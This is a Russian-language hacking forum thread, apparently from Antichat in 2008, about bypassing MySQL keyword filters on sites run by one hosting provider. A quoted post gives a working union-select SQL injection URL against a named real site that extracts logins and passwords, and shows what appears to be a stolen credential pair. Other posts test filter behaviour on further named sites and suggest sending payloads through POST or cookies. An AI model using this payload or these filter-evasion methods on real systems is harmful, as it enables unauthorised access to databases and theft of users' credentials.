ANTICHAT - обход фильтрации запрещённых слов в MySql

Страница 2 из 2

Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - обход фильтрации запрещённых слов в MySql (https://forum.antichat.xyz/showthread.php?t=56409)

goror

04.05.2008 15:38

Цитата:

Сообщение от Spyder

Да йопт, чё пробовать то))) Пост работает, сам проверял
Кстати там ещё фильтруется слово /etc/passwd :D
Вобщем вот
http://www.internatura.ru/index.php?op=cat&sec=4&gn=-1+union+select+concat_ws(':',login,password)+from+ users/*
viktor:1940

А если параметр в скрипте только через $_GET передается, есть возможность обхода фильтрации?

goror

04.05.2008 15:46

Цитата:

Сообщение от ENFIX

Довольно интересно...))
Запрос откидывается, если в запросе (масло маслянное) присутствуют Union, Select, From, именно в такой последовательности...
Тут думаю или пост, или пробовать подзапросы

На одном из серверов Sweb-a фильтруется даже select from,
например http://www.74region.ru/?select%20from ,
а на некоторых не фильтруется последовательность
"select, from, union, select".

-=megahertz=-

06.05.2008 10:03

выложите плз еще скрипт от маднета

blackybr

06.05.2008 10:59

Пора бы уже запомнить что на sweb фильтруется from /etc/ passwd и еще несколько подобных выражений.. обходится все посылкой пост запросов, кукисов ..и тд

Spyder

07.05.2008 10:26

кстати /etc/passwd фильтруется и через пост ))

goror

07.05.2008 12:21

Цитата:

Сообщение от blackybr

На нкоторых серверах sweb не фильтруется "from".

Пример.
http://1-avto.com/car.html?select%20from не фильтруется
а http://1-avto.com/car.html?union%20select%20from
фильтруется.

А по поводу пост запросов и т.д., в некоторых скриптах только гет проходит.

Время: 01:51

Страница 2 из 2

Показывать 40 сообщений этой темы на одной странице